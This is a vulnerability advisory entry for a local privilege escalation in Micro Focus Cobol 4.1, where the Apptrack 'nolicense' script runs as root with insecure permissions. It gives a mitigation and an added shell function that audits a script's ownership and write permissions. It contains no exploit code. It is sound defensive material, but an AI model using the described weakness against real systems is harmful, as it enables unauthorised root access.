Vendor: Cobol
By: SecurityFocus
CVSS: 7.2 HIGH
Privilege Escalation
CWE: 264
Product Name: Cobol
Affected Version From: 4.1
Affected Version To: 4.1
Patch Exists: NO
Related CWE: N/A
CPE: a:micro_focus:cobol
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix
2002
Micro Focus Cobol Apptrack Privilege Escalation Vulnerability
If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions. As a result, attackers may be able to execute arbitrary commands as root if the script is modified.
Mitigation:
Ensure that the 'Apptrack' feature is disabled and that the 'nolicense' script is not installed with insecure file permissions.
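
A permission check for the condition described above, added here as an example (not code from the advisory or from Micro Focus): it flags a root-executed script that has the wrong owner, is group- or world-writable, or sits in a directory where other users can replace it. The advisory does not give the install path of 'nolicense', so the path is passed as an argument; the function name `audit_root_script` is hypothetical.

```shell
#!/bin/sh
# Added example: audit a script that root executes (such as Apptrack's 'nolicense').
# Usage: audit_root_script PATH [EXPECTED_OWNER]   (EXPECTED_OWNER defaults to root)
# Prints one finding per line; returns 0 if clean, 1 on any finding, 2 on bad input.
# Scope: the script and its containing directory only, not every ancestor directory.

audit_root_script() {
    script=$1
    owner=${2:-root}
    findings=0

    # Refuse symlinks and non-files: the check must describe the file root really runs.
    if [ -L "$script" ] || [ ! -f "$script" ]; then
        echo "ERROR: $script is not a regular file" >&2
        return 2
    fi
    dir=$(dirname -- "$script")

    # The owner can always rewrite the file, so it must be the expected account.
    if [ -n "$(find "$script" -prune ! -user "$owner")" ]; then
        echo "FINDING: $script is not owned by $owner"
        findings=1
    fi
    # Group- or world-writable: other local users can change what root executes.
    if [ -n "$(find "$script" -prune \( -perm -020 -o -perm -002 \))" ]; then
        echo "FINDING: $script is group- or world-writable"
        findings=1
    fi
    # A writable directory lets a user swap the script for another file,
    # unless the sticky bit limits deletion and renaming to each file's owner.
    if [ -n "$(find "$dir" -prune \( -perm -020 -o -perm -002 \) ! -perm -1000)" ]; then
        echo "FINDING: $dir is group- or world-writable without the sticky bit"
        findings=1
    fi
    return "$findings"
}

# Run against a path given on the command line; the install path is site-specific.
if [ "$#" -ge 1 ]; then
    audit_root_script "$@"
fi
```

A clean result here covers only the script and its directory; the same ownership and mode checks apply to every directory above it.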